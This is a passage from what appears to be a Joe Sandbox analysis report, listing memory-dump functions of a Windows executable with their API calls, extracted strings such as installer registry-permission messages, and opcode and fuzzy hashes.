                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                    • String ID:
                                                    • API String ID: 3527656728-0
                                                    • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                    • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                    • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                    • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle
                                                    • String ID: -cI$.tmp$_iu
                                                    • API String ID: 3498533004-3964432171
                                                    • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                    • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                    • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                    • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                    APIs
                                                      • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                    • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                      • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                      • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                      • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                    • API String ID: 3312786188-1660910688
                                                    • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                    • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                    • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                    • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressByteCharHandleModuleMultiProcWide
                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                    • API String ID: 828529508-2866557904
                                                    • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                    • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                    • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                    • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                    APIs
                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                    • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                    • API String ID: 2573145106-3235461205
                                                    • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                    • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                    • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                    • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                    • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressExchangeHandleInterlockedModuleProc
                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                    • API String ID: 3478007392-2498399450
                                                    • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                    • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                    • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                    • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                    • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProcessThreadWindow
                                                    • String ID: AllowSetForegroundWindow$user32.dll
                                                    • API String ID: 1782028327-3855017861
                                                    • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                    • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                    • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                    • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                    • SaveDC.GDI32(?), ref: 00416C7B
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                    • RestoreDC.GDI32(?,?), ref: 00416D03
                                                    • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                    • String ID:
                                                    • API String ID: 3808407030-0
                                                    • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                    • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                    • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                    • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                    • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                    • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                    • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                    APIs
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                    • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                    • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                    • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                    • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                    • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                    • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$A26310A570DeleteObject
                                                    • String ID:
                                                    • API String ID: 4277397052-0
                                                    • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                    • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                    • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                    • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                    APIs
                                                      • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                    Strings
                                                    • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                    • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                    • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                    • API String ID: 1452528299-4018462623
                                                    • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                    • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                    • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                    • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 262959230-0
                                                    • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                    • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                    • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                    • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                    APIs
                                                    • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                    • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                    • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                    • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                    • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A122A18830$A480
                                                    • String ID:
                                                    • API String ID: 3325508737-0
                                                    • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                    • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                    • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                    • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                    APIs
                                                      • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                      • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                      • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                      • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                    • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                    • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                    • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                      • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                      • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                      • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                      • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                    • String ID: nLB
                                                    • API String ID: 1906964682-2031493005
                                                    • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                    • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                    • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                    • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                    APIs
                                                    • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                    • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Enum$NameOpenResourceUniversal
                                                    • String ID: Z
                                                    • API String ID: 3604996873-1505515367
                                                    • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                    • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
